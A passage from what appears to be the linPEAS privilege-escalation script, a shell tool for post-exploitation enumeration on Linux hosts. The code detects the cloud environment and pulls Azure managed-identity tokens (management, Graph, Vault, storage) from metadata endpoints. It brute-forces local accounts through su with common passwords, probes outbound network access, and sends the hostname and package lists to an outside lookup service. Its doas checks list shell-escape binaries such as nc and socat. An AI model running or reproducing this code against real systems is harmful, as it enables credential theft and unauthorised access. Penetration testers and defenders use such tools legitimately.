"X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) 3162 if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then 3163 is_aws_ec2="Yes" 3164 fi 3165 fi 3166 if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then 3167 is_aws_ec2_beanstalk="Yes" 3168 fi 3169 } 3170 3171 check_aws_ecs(){ 3172 is_aws_ecs="No" 3173 if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then 3174 is_aws_ecs="Yes"; 3175 aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4; 3176 aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 3177 elif (env | grep -q ECS_CONTAINER_METADATA_URI); then 3178 is_aws_ecs="Yes"; 3179 aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI; 3180 aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 3181 elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then 3182 is_aws_ecs="Yes"; 3183 fi 3184 if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then 3185 aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 3186 fi 3187 } 3188 3189 check_aws_lambda(){ 3190 is_aws_lambda="No" 3191 if (env | grep -q AWS_LAMBDA_); then 3192 is_aws_lambda="Yes" 3193 fi 3194 } 3195 3196 exec_with_jq(){ 3197 if [ "$(command -v jq || echo -n '')" ]; then 3198 $@ | jq 2>/dev/null; 3199 if ! [ $? -eq 0 ]; then 3200 $@; 3201 fi 3202 else 3203 $@; 3204 fi 3205 } 3206 3207 check_aws_codebuild(){ 3208 is_aws_codebuild="No" 3209 if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then 3210 is_aws_codebuild="Yes" 3211 fi 3212 } 3213 3214 check_gcp(){ 3215 is_gcp_vm="No" 3216 is_gcp_function="No" 3217 if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then 3218 is_gcp_vm="Yes" 3219 fi 3220 # CHeck if /workspace exists 3221 if [ -d "/workspace" ] && [ -d "/layers" ]; then 3222 is_gcp_vm="No" 3223 is_gcp_function="Yes" 3224 fi 3225 } 3226 3227 check_az_vm(){ 3228 is_az_vm="No" 3229 # 1. Check if the Azure log directory exists 3230 if [ -d "/var/log/azure/" ]; then 3231 is_az_vm="Yes" 3232 # 2. Check if 'reddog.microsoft.com' is found in /etc/resolv.conf 3233 elif grep -q "search reddog.microsoft.com" /etc/resolv.conf 2>/dev/null; then 3234 is_az_vm="Yes" 3235 else 3236 # 3. Try querying the Azure Metadata Service for more wide support (e.g. Azure Container Registry tasks need this) 3237 if type curl >/dev/null 2>&1; then 3238 meta_response=$(curl -s --max-time 2 \ 3239 "http://169.254.169.254/metadata/identity/oauth2/token") 3240 if echo "$meta_response" | grep -q "Missing"; then 3241 is_az_vm="Yes" 3242 fi 3243 elif type wget >/dev/null 2>&1; then 3244 meta_response=$(wget -qO- --timeout=2 \ 3245 "http://169.254.169.254/metadata/identity/oauth2/token") 3246 if echo "$meta_response" | grep -q "Missing"; then 3247 is_az_vm="Yes" 3248 fi 3249 fi 3250 fi 3251 } 3252 3253 check_az_app(){ 3254 is_az_app="No" 3255 if [ -d "/opt/microsoft" ] && env | grep -iq "azure"; then 3256 is_az_app="Yes" 3257 fi 3258 if [ -n "$IDENTITY_ENDPOINT" ] && echo "$IDENTITY_ENDPOINT" | grep -q "/token" && [ -n "$IDENTITY_HEADER" ]; then 3259 is_az_app="Yes" 3260 fi 3261 } 3262 3263 set_azure_request_command() { 3264 az_req="" 3265 if [ "$(command -v curl || echo -n '')" ]; then 3266 az_req="curl -s -f -L -H '$HEADER'" 3267 elif [ "$(command -v wget || echo -n '')" ]; then 3268 az_req="wget -q -O - --header '$HEADER'" 3269 else 3270 echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" 3271 fi 3272 } 3273 print_azure_identity_token() { 3274 print_3title "$1" "T1552.005,T1580" 3275 exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\\&resource=$2" 3276 echo 3277 } 3278 print_azure_standard_identity_tokens() { 3279 print_azure_identity_token "Management token" "https://management.azure.com/" 3280 print_azure_identity_token "Graph token" "https://graph.microsoft.com/" 3281 print_azure_identity_token "Vault token" "https://vault.azure.net/" 3282 print_azure_identity_token "Storage token" "https://storage.azure.com/" 3283 } 3284 3285 print_ps(){ 3286 (ls -d /proc/*/ 2>/dev/null | while read f; do 3287 CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess 3288 if [ "$CMDLINE" ]; 3289 then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3); 3290 printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; 3291 fi; 3292 done) 2>/dev/null | sort -r 3293 } 3294 3295 linpeas_json_escape(){ 3296 printf "%s" "$1" | sed 's/\\/\\\\/g; s/"/\\"/g; s/ / /g' 3297 } 3298 linpeas_os_release_field(){ 3299 [ -r /etc/os-release ] || return 3300 awk -F= -v key="$1" ' 3301 $1 == key { 3302 value=$0 3303 sub(/^[^=]*=/, "", value) 3304 gsub(/^"/, "", value) 3305 gsub(/"$/, "", value) 3306 print value 3307 exit 3308 } 3309 ' /etc/os-release 2>/dev/null 3310 } 3311 linpeas_os_package_ecosystem(){ 3312 _os_id="$(linpeas_os_release_field ID)" 3313 _os_version_id="$(linpeas_os_release_field VERSION_ID)" 3314 _os_version_major="$(printf "%s" "$_os_version_id" | cut -d. -f1)" 3315 case "$_os_id" in 3316 debian) [ "$_os_version_major" ] && printf "Debian:%s" "$_os_version_major" ;; 3317 ubuntu) [ "$_os_version_id" ] && printf "Ubuntu:%s" "$_os_version_id" ;; 3318 alpine) [ "$_os_version_id" ] && printf "Alpine:v%s" "$_os_version_id" ;; 3319 fedora) [ "$_os_version_id" ] && printf "Fedora:%s" "$_os_version_id" ;; 3320 amzn) [ "$_os_version_id" ] && printf "Amazon Linux:%s" "$_os_version_id" ;; 3321 rhel) [ "$_os_version_major" ] && printf "Red Hat:%s" "$_os_version_major" ;; 3322 centos) [ "$_os_version_major" ] && printf "CentOS:%s" "$_os_version_major" ;; 3323 rocky) [ "$_os_version_major" ] && printf "Rocky Linux:%s" "$_os_version_major" ;; 3324 almalinux) [ "$_os_version_major" ] && printf "AlmaLinux:%s" "$_os_version_major" ;; 3325 esac 3326 } 3327 linpeas_tabbed_packages_to_json_lines(){ 3328 awk -F '\t' -v manager="$1" -v ecosystem="$2" ' 3329 function esc(s) { gsub(/\\/,"\\\\",s); gsub(/"/,"\\\"",s); gsub(/\r/," ",s); return s } 3330 $1 != "" && $2 != "" { 3331 key=$1 "|" $2 3332 if (seen[key]++) next 3333 printf "{\"name\":\"%s\",\"version\":\"%s\",\"ecosystem\":\"%s\",\"manager\":\"%s\"}\n", esc($1), esc($2), esc(ecosystem), manager 3334 }' 3335 } 3336 linpeas_print_package_json_lines(){ 3337 _ecosystem="$(linpeas_os_package_ecosystem)" 3338 if command -v dpkg-query >/dev/null 2>&1; then 3339 dpkg-query -W -f='${source:Package}\t${source:Version}\t${binary:Package}\t${Version}\n' 2>/dev/null | awk -F '\t' ' 3340 { 3341 name=$1; version=$2 3342 if (name == "" || name == "-") { name=$3; version=$4 } 3343 if (version == "" || version == "-") { version=$4 } 3344 sub(/^src:/, "", name) 3345 if (name == "" || version == "") next 3346 printf "%s\t%s\n", name, version 3347 }' | linpeas_tabbed_packages_to_json_lines "dpkg" "$_ecosystem" 3348 elif command -v rpm >/dev/null 2>&1; then 3349 rpm -qa --qf '%{NAME}\t%{VERSION}-%{RELEASE}\n' 2>/dev/null | linpeas_tabbed_packages_to_json_lines "rpm" "$_ecosystem" 3350 elif command -v apk >/dev/null 2>&1; then 3351 apk info 2>/dev/null | while IFS= read -r _pkg_name; do 3352 [ "$_pkg_name" ] || continue 3353 _pkg_line="$(apk info -e -v "$_pkg_name" 2>/dev/null | head -n 1)" 3354 _pkg_version="$(printf "%s" "$_pkg_line" | awk -v n="$_pkg_name" 'index($0, n "-") == 1 { print substr($0, length(n) + 2); exit }')" 3355 [ "$_pkg_version" ] || continue 3356 printf '{"name":"%s","version":"%s","ecosystem":"%s","manager":"apk"}\n' \ 3357 "$(linpeas_json_escape "$_pkg_name")" "$(linpeas_json_escape "$_pkg_version")" "$(linpeas_json_escape "$_ecosystem")" 3358 done 3359 elif command -v pacman >/dev/null 2>&1; then 3360 pacman -Q 2>/dev/null | linpeas_tabbed_packages_to_json_lines "pacman" "$_ecosystem" 3361 fi 3362 } 3363 linpeas_packages_json(){ 3364 _limit="${HACKTRICKS_PACKAGE_LIMIT:-300}" 3365 linpeas_print_package_json_lines | awk -v max="$_limit" ' 3366 BEGIN { first=1; printf "[" } 3367 NF { 3368 if (count >= max) next 3369 if (!first) printf "," 3370 printf "%s", $0 3371 first=0 3372 count++ 3373 } 3374 END { printf "]" }' 3375 } 3376 linpeas_os_json(){ 3377 _os_id="$(linpeas_os_release_field ID)" 3378 _os_name="$(linpeas_os_release_field PRETTY_NAME)" 3379 _os_version_id="$(linpeas_os_release_field VERSION_ID)" 3380 _os_codename="$(linpeas_os_release_field VERSION_CODENAME)" 3381 printf '{"id":"%s","name":"%s","version_id":"%s","codename":"%s","kernel":{"release":"%s","version":"%s","arch":"%s"}}' \ 3382 "$(linpeas_json_escape "$_os_id")" \ 3383 "$(linpeas_json_escape "$_os_name")" \ 3384 "$(linpeas_json_escape "$_os_version_id")" \ 3385 "$(linpeas_json_escape "$_os_codename")" \ 3386 "$(linpeas_json_escape "$(uname -r 2>/dev/null)")" \ 3387 "$(linpeas_json_escape "$(uname -v 2>/dev/null)")" \ 3388 "$(linpeas_json_escape "$(uname -m 2>/dev/null)")" 3389 } 3390 linpeas_host_checker_payload(){ 3391 _hostname="$(hostname 2>/dev/null)" 3392 if [ "$ONLINE_VULN_CHECKS" ]; then 3393 printf '{"hostname":"%s","source":"linpeas","version":"%s","online_package_check":true,"os":%s,"packages":%s}' \ 3394 "$(linpeas_json_escape "$_hostname")" \ 3395 "$(linpeas_json_escape "$VERSION")" \ 3396 "$(linpeas_os_json)" \ 3397 "$(linpeas_packages_json)" 3398 else 3399 printf '{"hostname":"%s","source":"linpeas","version":"%s"}' \ 3400 "$(linpeas_json_escape "$_hostname")" \ 3401 "$(linpeas_json_escape "$VERSION")" 3402 fi 3403 } 3404 linpeas_start_host_checker_lookup(){ 3405 [ "$NOT_CHECK_EXTERNAL_HOSTNAME" ] && return 3406 [ "$LINPEAS_HOST_CHECKER_STARTED" ] && return 3407 INTERNET_SEARCH_TIMEOUT=15 3408 LINPEAS_HOST_CHECKER_STARTED="1" 3409 LINPEAS_HOST_CHECKER_OUT="${TMPDIR:-/tmp}/linpeas_host_checker_$$.json" 3410 LINPEAS_HOST_CHECKER_ERR="${TMPDIR:-/tmp}/linpeas_host_checker_$$.err" 3411 _hacktricks_host_checker_url="${HACKTRICKS_HOST_CHECKER_URL:-https://tools.hacktricks.wiki/api/host-checker}" 3412 _hacktricks_payload="$(linpeas_host_checker_payload)" 3413 if command -v curl >/dev/null 2>&1; then 3414 (curl -s "$_hacktricks_host_checker_url" -H "User-Agent: linpeas" --data-binary "$_hacktricks_payload" -H "Content-Type: application/json" --max-time "$INTERNET_SEARCH_TIMEOUT" > "$LINPEAS_HOST_CHECKER_OUT" 2>"$LINPEAS_HOST_CHECKER_ERR") & 3415 LINPEAS_HOST_CHECKER_PID=$! 3416 elif command -v wget >/dev/null 2>&1; then 3417 (wget -q -O - "$_hacktricks_host_checker_url" --header "User-Agent: linpeas" --header "Content-Type: application/json" --post-data "$_hacktricks_payload" --timeout "$INTERNET_SEARCH_TIMEOUT" > "$LINPEAS_HOST_CHECKER_OUT" 2>"$LINPEAS_HOST_CHECKER_ERR") & 3418 LINPEAS_HOST_CHECKER_PID=$! 3419 else 3420 printf '{"error":"wget or curl not found"}\n' > "$LINPEAS_HOST_CHECKER_OUT" 3421 fi 3422 } 3423 linpeas_wait_host_checker_lookup(){ 3424 [ "$NOT_CHECK_EXTERNAL_HOSTNAME" ] && return 1 3425 linpeas_start_host_checker_lookup 3426 if [ "$LINPEAS_HOST_CHECKER_PID" ]; then 3427 wait "$LINPEAS_HOST_CHECKER_PID" 2>/dev/null 3428 LINPEAS_HOST_CHECKER_PID="" 3429 fi 3430 [ -s "$LINPEAS_HOST_CHECKER_OUT" ] 3431 } 3432 linpeas_strip_package_vulns_from_host_response(){ 3433 if command -v jq >/dev/null 2>&1; then 3434 jq 'del(.package_vulnerabilities)' "$LINPEAS_HOST_CHECKER_OUT" 2>/dev/null && return 3435 fi 3436 awk ' 3437 function brace_delta(s, t, opens, closes) { 3438 t=s; opens=gsub(/{/,"{",t) 3439 t=s; closes=gsub(/}/,"}",t) 3440 return opens - closes 3441 } 3442 skip { 3443 depth += brace_delta($0) 3444 if (depth <= 0) skip=0 3445 next 3446 } 3447 /"package_vulnerabilities"[[:space:]]*:/ { 3448 sub(/,[[:space:]]*$/, "", prev) 3449 skip=1 3450 depth=brace_delta($0) 3451 if (depth <= 0) skip=0 3452 next 3453 } 3454 { 3455 if (have) print prev 3456 prev=$0 3457 have=1 3458 } 3459 END { 3460 if (have) print prev 3461 } 3462 ' "$LINPEAS_HOST_CHECKER_OUT" 3463 } 3464 check_external_hostname(){ 3465 if linpeas_wait_host_checker_lookup; then 3466 linpeas_strip_package_vulns_from_host_response 3467 else 3468 echo "HackTricks host checker did not return data" 3469 fi 3470 } 3471 linpeas_print_package_vulnerabilities_with_jq(){ 3472 jq -r ' 3473 .package_vulnerabilities as $pv 3474 | if ($pv == null) then 3475 empty 3476 elif (($pv.affected // 0) | tonumber) == 0 then 3477 "No vulnerable packages found by online lookup (checked \($pv.checked // 0) packages)." 3478 else 3479 "Online package vulnerabilities found: \($pv.affected) vulnerable package(s), checked \($pv.checked // 0).", 3480 ( 3481 $pv.vulnerable_packages[:50][]? 3482 | "- \(.name // "?") \(.version // "?") [\(.ecosystem // "unknown")]: \((.vulns // []) | join(", "))" 3483 ), 3484 ( 3485 if (($pv.vulnerable_packages | length) > 50) then 3486 "... \((($pv.vulnerable_packages | length) - 50)) more vulnerable package(s) not shown." 3487 else empty end 3488 ) 3489 end 3490 ' "$LINPEAS_HOST_CHECKER_OUT" 2>/dev/null 3491 } 3492 linpeas_print_package_vulnerabilities_with_awk(){ 3493 awk ' 3494 function json_value(line) { 3495 sub(/^[^:]*:[[:space:]]*"/, "", line) 3496 sub(/",?[[:space:]]*$/, "", line) 3497 return line 3498 } 3499 function json_number(line) { 3500 sub(/^[^:]*:[[:space:]]*/, "", line) 3501 sub(/,?[[:space:]]*$/, "", line) 3502 return line 3503 } 3504 function json_string(line) { 3505 sub(/^[[:space:]]*"/, "", line) 3506 sub(/",?[[:space:]]*$/, "", line) 3507 return line 3508 } 3509 function flush_pkg() { 3510 if (name != "" && version != "") { 3511 total++ 3512 if (shown < 50) { 3513 print "- " name " " version " [" (ecosystem != "" ? ecosystem : "unknown") "]: " vulns 3514 shown++ 3515 } 3516 } 3517 name=""; version=""; ecosystem=""; vulns=""; in_vulns=0 3518 } 3519 /"package_vulnerabilities"[[:space:]]*:/ { in_pv=1; next } 3520 in_pv && /"checked"[[:space:]]*:/ { checked=json_number($0); next } 3521 in_pv && /"affected"[[:space:]]*:/ { affected=json_number($0); next } 3522 in_pv && /"vulnerable_packages"[[:space:]]*:[[:space:]]*\[/ { in_pkgs=1; next } 3523 in_pkgs && /"name"[[:space:]]*:/ { name=json_value($0); next } 3524 in_pkgs && /"version"[[:space:]]*:/ { version=json_value($0); next } 3525 in_pkgs && /"ecosystem"[[:space:]]*:/ { ecosystem=json_value($0); next } 3526 in_pkgs && /"vulns"[[:space:]]*:[[:space:]]*\[/ { in_vulns=1; next } 3527 in_vulns && /"/ { 3528 v=json_string($0) 3529 if (v != "") vulns = vulns (vulns != "" ? ", " : "") v 3530 next 3531 } 3532 in_vulns && /\]/ { in_vulns=0; next } 3533 in_pkgs && /^[[:space:]]*}[,]?[[:space:]]*$/ { flush_pkg(); next } 3534 END { 3535 if (affected == "") exit 3536 if ((affected + 0) == 0) { 3537 print "No vulnerable packages found by online lookup (checked " (checked != "" ? checked : 0) " packages)." 3538 } else { 3539 print "Online package vulnerabilities found: " affected " vulnerable package(s), checked " (checked != "" ? checked : 0) "." 3540 if (total > 50) print "... " (total - 50) " more vulnerable package(s) not shown." 3541 } 3542 } 3543 ' "$LINPEAS_HOST_CHECKER_OUT" | awk ' 3544 /^Online package vulnerabilities found:/ { header=$0; next } 3545 /^No vulnerable packages found/ { print; next } 3546 /^\.\.\. / { more=$0; next } 3547 /^- / { lines[++count]=$0; next } 3548 END { 3549 if (header) print header 3550 for (i=1; i<=count && i<=50; i++) print lines[i] 3551 if (more) print more 3552 } 3553 ' 3554 } 3555 linpeas_print_package_vulnerabilities(){ 3556 [ "$ONLINE_VULN_CHECKS" ] || return 3557 if ! linpeas_wait_host_checker_lookup; then 3558 echo "Online package vulnerability lookup did not return data" 3559 return 3560 fi 3561 if command -v jq >/dev/null 2>&1; then 3562 linpeas_print_package_vulnerabilities_with_jq | sed -${E} "s,CVE-[0-9]{4}-[0-9]+,${SED_RED_YELLOW},g" 3563 else 3564 linpeas_print_package_vulnerabilities_with_awk | sed -${E} "s,CVE-[0-9]{4}-[0-9]+,${SED_RED_YELLOW},g" 3565 fi 3566 } 3567 3568 check_dns(){ 3569 local TIMEOUT_INTERNET_SECONDS_DNS=$1 3570 if ! [ -f "/bin/bash" ]; then 3571 echo " /bin/bash not found" 3572 return 3573 fi 3574 # example.com 3575 (bash -c '((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is not accessible"') & local_pid=$! 3576 sleep $TIMEOUT_INTERNET_SECONDS_DNS && kill -9 $local_pid 2>/dev/null && echo "DNS is not accessible" 3577 } 3578 3579 check_tcp_80(){ 3580 local TIMEOUT_INTERNET_SECONDS_80=$1 3581 if ! [ -f "/bin/bash" ]; then 3582 echo " /bin/bash not found" 3583 return 3584 fi 3585 # example.com 3586 (bash -c '(echo >/dev/tcp/104.18.74.230/80 2>/dev/null && echo "Port 80 is accessible" && exit 0) 2>/dev/null || echo "Port 80 is not accessible"') & local_pid=$! 3587 sleep $TIMEOUT_INTERNET_SECONDS_80 && kill -9 $local_pid 2>/dev/null && echo "Port 80 is not accessible" 3588 } 3589 3590 su_try_pwd(){ 3591 BFUSER=$1 3592 PASSWORDTRY=$2 3593 trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null) 3594 if [ $? -eq 0 ]; then 3595 echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," 3596 fi 3597 } 3598 3599 check_tcp_443_bin () { 3600 local TIMEOUT_INTERNET_SECONDS_443_BIN=$1 3601 local url_443="https://1.1.1.1" 3602 if command -v curl >/dev/null 2>&1; then 3603 if curl -s -k --connect-timeout "$TIMEOUT_INTERNET_SECONDS_443_BIN" "$url_443" >/dev/null 2>&1 3604 then 3605 echo "Port 443 is accessible with curl" 3606 return 0 # ✅ success 3607 else 3608 echo "Port 443 is not accessible with curl" 3609 return 1 3610 fi 3611 elif command -v wget >/dev/null 2>&1; then 3612 if wget -q --no-check-certificate --timeout="$TIMEOUT_INTERNET_SECONDS_443_BIN" -O - "$url_443" >/dev/null 2>&1 3613 then 3614 echo "Port 443 is accessible with wget" 3615 return 0 3616 else 3617 echo "Port 443 is not accessible with wget" 3618 return 1 3619 fi 3620 else 3621 echo "Neither curl nor wget available" 3622 return 1 3623 fi 3624 } 3625 3626 check_icmp(){ 3627 local TIMEOUT_INTERNET_SECONDS_ICMP=$1 3628 if ! [ "$(command -v ping 2>/dev/null || echo -n '')" ]; then 3629 echo " ping not found" 3630 return 3631 fi 3632 # example.com 3633 ((ping -c 1 1.1.1.1 2>/dev/null | grep -Ei "1 received|1 packets received" && echo "ICMP is accessible" || echo "ICMP is not accessible" 2>/dev/null) | grep "accessible" && exit 0 ) 2>/dev/null || echo "ICMP is not accessible" & local_pid=$! 3634 sleep $TIMEOUT_INTERNET_SECONDS_ICMP && kill -9 $local_pid 2>/dev/null && echo "ICMP is not accessible" 3635 } 3636 3637 check_tcp_443(){ 3638 local TIMEOUT_INTERNET_SECONDS_443=$1 3639 if ! [ -f "/bin/bash" ]; then 3640 echo " /bin/bash not found" 3641 return 3642 fi 3643 # example.com 3644 (bash -c '(echo >/dev/tcp/104.18.74.230/443 2>/dev/null && echo "Port 443 is accessible" && exit 0) 2>/dev/null || echo "Port 443 is not accessible"') & local_pid=$! 3645 sleep $TIMEOUT_INTERNET_SECONDS_443 && kill -9 $local_pid 2>/dev/null && echo "Port 443 is not accessible" 3646 } 3647 3648 check_if_su_brute(){ 3649 EXISTS_SU="$(command -v su 2>/dev/null || echo -n '')" 3650 error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1); 3651 if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then 3652 echo "1" 3653 fi 3654 } 3655 3656 su_brute_user_num(){ 3657 BFUSER=$1 3658 TRIES=$2 3659 su_try_pwd "$BFUSER" "" & #Try without password 3660 su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password 3661 su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password 3662 if [ "$PASSWORD" ]; then 3663 su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password 3664 fi 3665 for i in $(seq "$TRIES"); do 3666 su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000) 3667 sleep 0.007 # To not overload the system 3668 done 3669 wait 3670 } 3671 3672 get_current_user_privot_pid(){ 3673 CURRENT_USER_PIVOT_PID="" 3674 if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then 3675 # Function to get user by PID 3676 get_user_by_pid() { 3677 ps -p "$1" -o user | grep -v "USER" 3678 } 3679 # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user 3680 ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do 3681 if [ "$ppid" = "0" ]; then 3682 continue 3683 fi 3684 ppid_user=$(get_user_by_pid "$ppid") 3685 if echo "$user" | grep -Eqv "$ppid_user|root$"; then 3686 if [ "$ppid_user" = "$USER" ]; then 3687 CURRENT_USER_PIVOT_PID="$ppid" 3688 fi 3689 fi 3690 done 3691 echo "" 3692 fi 3693 } 3694 3695 doas_extract_upstream_version() { 3696 printf "%s\n" "$1" | grep -oE '[0-9]+(\.[0-9]+){1,2}' | head -n 1 3697 } 3698 doas_version_ge() { 3699 awk -v left="$1" -v right="$2" 'BEGIN { 3700 left_n = split(left, left_v, ".") 3701 right_n = split(right, right_v, ".") 3702 max_n = left_n > right_n ? left_n : right_n 3703 for (i = 1; i <= max_n; i++) { 3704 left_i = (i <= left_n ? left_v[i] : 0) + 0 3705 right_i = (i <= right_n ? right_v[i] : 0) + 0 3706 if (left_i > right_i) exit 0 3707 if (left_i < right_i) exit 1 3708 } 3709 exit 0 3710 }' 3711 } 3712 doas_version_lt() { 3713 if doas_version_ge "$1" "$2"; then 3714 return 1 3715 fi 3716 return 0 3717 } 3718 doas_version_le() { 3719 if doas_version_lt "$2" "$1"; then 3720 return 1 3721 fi 3722 return 0 3723 } 3724 doas_read_rules() { 3725 awk ' 3726 function trim(value) { 3727 sub(/^[[:space:]]+/, "", value) 3728 sub(/[[:space:]]+$/, "", value) 3729 return value 3730 } 3731 { 3732 source = $0 3733 output = "" 3734 quoted = 0 3735 escaped = 0 3736 for (i = 1; i <= length(source); i++) { 3737 char = substr(source, i, 1) 3738 if (char == "#" && !quoted) break 3739 output = output char 3740 if (char == "\"" && !escaped) quoted = !quoted 3741 if (char == "\\" && !escaped) escaped = 1 3742 else escaped = 0 3743 } 3744 output = trim(output) 3745 if (output ~ /^(permit|deny)([[:space:]]|$)/) 3746 printf "%d\t%s\n", NR, output 3747 } 3748 ' "$1" 2>/dev/null 3749 } 3750 doas_rule_identity() { 3751 printf "%s\n" "$1" | awk ' 3752 { 3753 in_setenv = 0 3754 for (i = 2; i <= NF; i++) { 3755 token = $i 3756 if (in_setenv) { 3757 if (token ~ /}/) in_setenv = 0 3758 continue 3759 } 3760 if (token == "setenv") { 3761 in_setenv = 1 3762 continue 3763 } 3764 if (token == "nopass" || token == "nolog" || token == "persist" || token == "keepenv") 3765 continue 3766 gsub(/^"|"$/, "", token) 3767 print token 3768 exit 3769 } 3770 } 3771 ' 3772 } 3773 doas_rule_has_option() { 3774 printf "%s\n" "$1" | awk -v wanted="$2" ' 3775 { 3776 in_setenv = 0 3777 for (i = 2; i <= NF; i++) { 3778 token = $i 3779 if (in_setenv) { 3780 if (token ~ /}/) in_setenv = 0 3781 continue 3782 } 3783 if (token == "setenv") { 3784 if (wanted == token) exit 0 3785 in_setenv = 1 3786 continue 3787 } 3788 if (token == "nopass" || token == "nolog" || token == "persist" || token == "keepenv") { 3789 if (wanted == token) exit 0 3790 continue 3791 } 3792 exit 1 3793 } 3794 exit 1 3795 } 3796 ' 3797 } 3798 doas_rule_has_dangerous_environment() { 3799 if doas_rule_has_option "$1" keepenv; then 3800 return 0 3801 fi 3802 printf "%s\n" "$1" | grep -Eq '(^|[[:space:]{])(setenv[[:space:]]*\{[^}]*[[:space:]])?(PATH|LD_PRELOAD|LD_LIBRARY_PATH|BASH_ENV|ENV|PYTHONPATH|PERL5LIB|RUBYLIB)([=[:space:]}]|$)' 3803 } 3804 doas_rule_command() { 3805 printf "%s\n" "$1" | awk ' 3806 { 3807 for (i = 1; i < NF; i++) { 3808 if ($i == "cmd") { 3809 command = $(i + 1) 3810 gsub(/^"|"$/, "", command) 3811 print command 3812 exit 3813 } 3814 } 3815 } 3816 ' 3817 } 3818 doas_rule_targets_root() { 3819 printf "%s\n" "$1" | awk ' 3820 { 3821 for (i = 1; i < NF; i++) { 3822 if ($i == "as") { 3823 target = $(i + 1) 3824 gsub(/^"|"$/, "", target) 3825 exit(target == "root" || target == "0" || target == "#0" ? 0 : 1) 3826 } 3827 } 3828 exit 0 3829 } 3830 ' 3831 } 3832 doas_rule_applies_to_current_user() { 3833 doas_rule_identity_value="$(doas_rule_identity "$1")" 3834 case "$doas_rule_identity_value" in 3835 "$doas_current_user"|"$doas_current_uid"|"#$doas_current_uid") return 0 ;; 3836 esac 3837 case "$doas_rule_identity_value" in 3838 :*) 3839 doas_rule_identity_value="${doas_rule_identity_value#:}" 3840 for doas_candidate in $doas_current_groups $doas_current_gids; do 3841 if [ "$doas_candidate" = "$doas_rule_identity_value" ] || [ "#$doas_candidate" = "$doas_rule_identity_value" ]; then 3842 return 0 3843 fi 3844 done 3845 ;; 3846 esac 3847 return 1 3848 } 3849 doas_command_is_dangerous() { 3850 doas_rule_cmd="$1" 3851 doas_rule_cmd="${doas_rule_cmd##*/}" 3852 case "$doas_rule_cmd" in 3853 ash|awk|bash|busybox|csh|dash|dstat|ed|env|expect|find|fish|gdb|git|ionice|jrunscript|ksh|less|lua|make|more|mv|nano|nawk|nc|ncat|nice|node|nvim|perl|php|python|python2|python3|rake|rlwrap|ruby|run-parts|rvim|sed|sh|socat|sqlite3|tar|tee|tclsh|vi|vim|watch|xargs|zsh) 3854 return 0 3855 ;; 3856 esac 3857 if [ -n "${sudoVB1:-}" ] && printf " %s\n" "$1" | grep -Eq "$sudoVB1" 2>/dev/null; then 3858 return 0 3859 fi 3860 if [ -n "${sudoVB2:-}" ] && printf " %s\n" "$1" | grep -Eq "$sudoVB2" 2>/dev/null; then 3861 return 0 3862 fi 3863 return 1 3864 } 3865 doas_get_package_details() { 3866 doas_package_manager="" 3867 doas_package_name="" 3868 doas_package_full_version="" 3869 doas_package_source="" 3870 doas_package_homepage="" 3871 doas_package_implementation="unknown" 3872 if command -v dpkg-query >/dev/null 2>&1; then 3873 doas_package_name="$(dpkg-query -S "$1" 2>/dev/null | head -n 1 | sed 's/: .*//' | cut -d: -f1)" 3874 if [ -n "$doas_package_name" ]; then 3875 doas_package_manager="dpkg" 3876 doas_package_full_version="$(dpkg-query -W -f='$''{Version}\n' "$doas_package_name" 2>/dev/null | head -n 1)" 3877 doas_package_source="$(dpkg-query -W -f='$''{source:Package}\n' "$doas_package_name" 2>/dev/null | head -n 1 | sed 's/^src://')" 3878 doas_package_homepage="$(dpkg-query -W -f='$''{Homepage}\n' "$doas_package_name" 2>/dev/null | head -n 1)" 3879 fi 3880 elif command -v rpm >/dev/null 2>&1; then 3881 doas_package_line="$(rpm -qf --qf '%{NAME}|%{VERSION}-%{RELEASE}|%{URL}\n' "$1" 2>/dev/null | head -n 1)" 3882 if [ -n "$doas_package_line" ]; then 3883 doas_package_manager="rpm" 3884 doas_package_name="$(printf "%s" "$doas_package_line" | cut -d'|' -f1)" 3885 